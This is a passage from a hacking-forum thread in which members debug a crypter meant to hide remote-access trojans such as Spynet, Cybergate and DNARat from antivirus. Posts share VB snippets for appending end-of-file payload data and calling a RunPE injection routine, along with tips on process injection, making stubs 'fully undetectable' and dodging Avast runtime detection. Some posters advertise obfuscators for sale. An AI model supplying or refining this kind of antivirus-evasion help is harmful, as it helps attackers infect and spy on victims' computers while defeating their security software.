XR3X
Clicky

Jump to content


Photo

The Matrix Project

Source

  • This topic is locked This topic is locked
43 replies to this topic

#21 mystario

mystario

    Beginner

  • Members
  • Reputation: 0
    Neutral
  • 18 posts

Posted 11 March 2013 - 03:34 PM

IS THIS WORKING WITH WIN7



#22 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Locationmsfconsole
Contributor

Posted 11 March 2013 - 04:24 PM

no, it only work with win 3.11 and win 95 ... 


  • ali_m, SuckerZ and to.Index like this

#23 Trojan

Trojan

    Beginner

  • Members
  • Reputation: 6
    Neutral
  • 16 posts
  • Location127.0.0.1

Posted 03 May 2013 - 04:36 PM

This looks like an awesome project, best of luck to everyone involved!

-Trojan


39099.png

 

If you need anything feel free to add me on my jabber.

My Jabber : [email protected]


#24 noh4t

noh4t

    Intermediate Member

  • Verified Seller
  • Reputation: 136
    Very Good
  • 260 posts
  • LocationBasic Input/Output System
Contributor

Posted 07 September 2013 - 06:49 PM

Nice project im working with it currently i was just wondering is there a way too get this working on 64bit without changing the runpe?

Obfuscator - x64/x86 [0/35]
-Dynamic Output-

- FUD-

Pm For Jabber.
 


#25 SuckerZ

SuckerZ

    Intermediate Member

  • Associate
  • Reputation: 67
    Good
  • 160 posts

Posted 07 September 2013 - 07:19 PM

no, it only work with win 3.11 and win 95 ... 

 yeah u made my day ;) nice project



#26 noh4t

noh4t

    Intermediate Member

  • Verified Seller
  • Reputation: 136
    Very Good
  • 260 posts
  • LocationBasic Input/Output System
Contributor

Posted 08 September 2013 - 12:25 AM

Dam.. worked on this all day and it does not work with any of my programs :( such a shame.. easy fix or should i give up?

Not working with Spynet/Cybergate/DNARat .... such a shame such a nice crypter too..

Obfuscator - x64/x86 [0/35]
-Dynamic Output-

- FUD-

Pm For Jabber.
 


#27 poison2012

poison2012

    Member

  • Members
  • Reputation: 34
    Fair
  • 52 posts

Posted 08 September 2013 - 03:24 PM

Something is going on here :)

Good work & luck!



#28 noh4t

noh4t

    Intermediate Member

  • Verified Seller
  • Reputation: 136
    Very Good
  • 260 posts
  • LocationBasic Input/Output System
Contributor

Posted 08 September 2013 - 03:52 PM

Replaced GetfilePath with another method and also tryed too change the runpe too a simular shell code one..

Still fails with spynet and dnarat once the rat has droped i can see it in task manager it does successfully drop into its install directory then it goes too inject into default browser and comes up with a erorr about firefox run times..

Obfuscator - x64/x86 [0/35]
-Dynamic Output-

- FUD-

Pm For Jabber.
 


#29 DualCoder

DualCoder

    Member

  • Associate
  • Reputation: 39
    Fair
  • 34 posts
  • LocationSweden

Posted 08 September 2013 - 04:38 PM

Dam.. worked on this all day and it does not work with any of my programs :( such a shame.. easy fix or should i give up?

Not working with Spynet/Cybergate/DNARat .... such a shame such a nice crypter too..

 

Which stub are you using? If it's the one I wrote (C++) maybe I can help...

 

//DualCoder


  • noh4t likes this

#30 noh4t

noh4t

    Intermediate Member

  • Verified Seller
  • Reputation: 136
    Very Good
  • 260 posts
  • LocationBasic Input/Output System
Contributor

Posted 08 September 2013 - 04:40 PM

Which stub are you using? If it's the one I wrote (C++) maybe I can help...
 
//DualCoder


I Wish i knew c++ but i am using the VB Version posted. thanks though dual.

Obfuscator - x64/x86 [0/35]
-Dynamic Output-

- FUD-

Pm For Jabber.
 


#31 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Locationmsfconsole
Contributor

Posted 08 September 2013 - 07:13 PM

you might add eof support in builder to make it work.



#32 noh4t

noh4t

    Intermediate Member

  • Verified Seller
  • Reputation: 136
    Very Good
  • 260 posts
  • LocationBasic Input/Output System
Contributor

Posted 08 September 2013 - 07:26 PM

you might add eof support in builder to make it work.

It Already has EOF Support i just checked.


Public Sub WriteEOFData(sFilePath As String, sEOFData As String)
On Error Resume Next
Dim sFile As String
Dim lFF As Long

lFF = FreeFile

Open sFilePath For Binary As #lFF
sFile = Space(LOF(lFF))
Get #lFF, , sFile
Close #lFF

Kill sFilePath
lFF = FreeFile

Open sFilePath For Binary As #lFF
Put #lFF, , sFile & sEOFData
Close #lFF
End Sub


Also i fuded the stub but avast picks it up at runtime not scantime :(

Attached Files


Obfuscator - x64/x86 [0/35]
-Dynamic Output-

- FUD-

Pm For Jabber.
 


#33 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Locationmsfconsole
Contributor

Posted 08 September 2013 - 08:05 PM

i meant check it not add, sry. if it dont work try to inject in its own process (app.path)

or try to use it without callapi i couldnt take a look at that scrs atm but it was working on win7 64 bit. try bozok rat, if it fails to connect, there is something wrong with your os or modifications on stub.


  • noh4t likes this

#34 noh4t

noh4t

    Intermediate Member

  • Verified Seller
  • Reputation: 136
    Very Good
  • 260 posts
  • LocationBasic Input/Output System
Contributor

Posted 08 September 2013 - 08:40 PM

i meant check it not add, sry. if it dont work try to inject in its own process (app.path)
or try to use it without callapi i couldnt take a look at that scrs atm but it was working on win7 64 bit. try bozok rat, if it fails to connect, there is something wrong with your os or modifications on stub.



Okay i will try neelix also bozok will work fine becuase normal version has no injection seems its only programs that inject that have issues.

Will keep you updated if anybody els wants too help would be apresheated

Obfuscator - x64/x86 [0/35]
-Dynamic Output-

- FUD-

Pm For Jabber.
 


#35 noh4t

noh4t

    Intermediate Member

  • Verified Seller
  • Reputation: 136
    Very Good
  • 260 posts
  • LocationBasic Input/Output System
Contributor

Posted 10 September 2013 - 07:10 PM

'app.path

If Mid$(RootOptions, 3, 1) = 1 Then Call RootPE(Environ("windir") & "\App.Path & " \ " & App.EXEName & .exe", RootByte)

---------------------------
Projekt1
---------------------------
Run-time error '13':

Type mismatch
---------------------------
OK
---------------------------

what is wrong with my command~?

Obfuscator - x64/x86 [0/35]
-Dynamic Output-

- FUD-

Pm For Jabber.
 


#36 SuckerZ

SuckerZ

    Intermediate Member

  • Associate
  • Reputation: 67
    Good
  • 160 posts

Posted 11 September 2013 - 12:06 AM

try this: If Mid$(RootOptions, 3, 1) = 1 Then Call RootPE(Environ("windir") & "\" & App.Path & " \ " & App.EXEName & .exe", RootByte())



#37 SuckerZ

SuckerZ

    Intermediate Member

  • Associate
  • Reputation: 67
    Good
  • 160 posts

Posted 11 September 2013 - 12:42 AM

this is better:

 

If (Mid$(RootOptions, 3, 1) = 1) Then Call RootPE(App.Path & " \ " & App.EXEName & " .exe", RootByte())

 

should be working :)


  • Neelix likes this

#38 Neelix

Neelix

    Expert

  • Moderator
  • Reputation: 582
    Excellent
  • 686 posts
  • Locationmsfconsole
Contributor

Posted 11 September 2013 - 03:23 AM

'app.path

If Mid$(RootOptions, 3, 1) = 1 Then Call RootPE(Environ("windir") & "\App.Path & " \ " & App.EXEName & .exe", RootByte)

---------------------------
Projekt1
---------------------------
Run-time error '13':

Type mismatch
---------------------------
OK
---------------------------

what is wrong with my command~?

:blink:

 

Might first understand the basics of vb before messing around with crypters.

 

 

this is better:

 

If (Mid$(RootOptions, 3, 1) = 1) Then Call RootPE(App.Path & " \ " & App.EXEName & " .exe", RootByte())

 

should be working :)

:)



#39 noh4t

noh4t

    Intermediate Member

  • Verified Seller
  • Reputation: 136
    Very Good
  • 260 posts
  • LocationBasic Input/Output System
Contributor

Posted 12 September 2013 - 02:11 AM

I Made it into a function it's less detected working this way.

Thanks

Obfuscator - x64/x86 [0/35]
-Dynamic Output-

- FUD-

Pm For Jabber.
 


#40 dafuq

dafuq

    Beginner

  • Members
  • Reputation: 2
    Neutral
  • 12 posts

Posted 06 December 2013 - 01:16 PM

 

 

Good idea/project.

Might wanna let the disable firewall out, This could lead to higher detection rate.

Since most of the bots/malware are connecting to a server and already have a firewall bypass in them you could leave that option.

Also an idea is inject into a specific custom process.

 

I will take a look at the c++ part.







Also tagged with one or more of these keywords: Source